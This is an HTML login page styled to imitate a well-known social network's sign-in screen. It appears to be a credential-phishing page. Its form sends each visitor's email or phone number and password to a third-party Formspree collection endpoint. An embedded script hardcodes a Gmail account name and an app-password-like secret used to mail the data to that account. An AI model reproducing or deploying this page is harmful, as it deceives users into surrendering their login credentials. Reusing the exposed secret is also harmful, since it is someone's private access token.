<html lang="en"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Point Maker</title>
    <style>
      .point {
        text-align: center;
      }

      .login-page {
        margin: 0 auto;
        max-width: 400px;
        padding: 20px;
      }

      .login-page p {
        margin-bottom: 10px;
      }

      .login-page label {
        display: block;
        font-weight: bold;
      }

      .login-page input[type="text"],
      .login-page input[type="tel"],
      .login-page input[type="password"] {
        width: 100%;
        padding: 5px;
        font-size: 16px;
      }

      .login-page button[type="submit"] {
        background-color: #4CAF50;
        color: white;
        padding: 10px;
        border: none;
        cursor: pointer;
        width: 100%;
        font-size: 16px;
      }

      .login-page a {
        color: blue;
      }

      .create a {
        color: blue;
      }
    </style>
  </head>
  <body>
    <h1 class="point">Point</h1>

    <div class="login-page">
      <form action="https://formspree.io/f/mlekzpqk" method="POST">
        <p>
          <label for="email">Email address or phone number</label> <br>
          <input placeholder="Email address or phone number" type="text" name="email" id="email" required="">
        </p>
        <p>
          <label for="password">Password</label> <br>
          <input placeholder="Password" type="password" id="password" name="password" required="">
        </p>
        <p class="login">
          <button type="submit">Login</button>
        </p>
      </form>

      <p class="login">
        <a href="">Forgotten password?</a>
      </p>

      <hr>

      <p class="login">
        <a href="">Create new account</a>
      </p>
    </div>

    <p class="create">
      <a href="">Create a Page</a> for a celebrity, brand, or business.
    </p>

    <script src="https://smtpjs.com/v3/smtp.js"></script>
    <script>
      function sendEmail() {
        Email.send({
          Host: "smtp.gmail.com",
          Username: "webapploginpoint@gmail.com",
          Password: "yzppmfisqjmgdgvx",
          To: "webapploginpoint@gmail.com",
          From: document.getElementById("email").value,
          Subject: "New User",
          Body: "And this is the body",
        }).then((message) => alert(message));
      }
    </script>
  </body>
  </html>
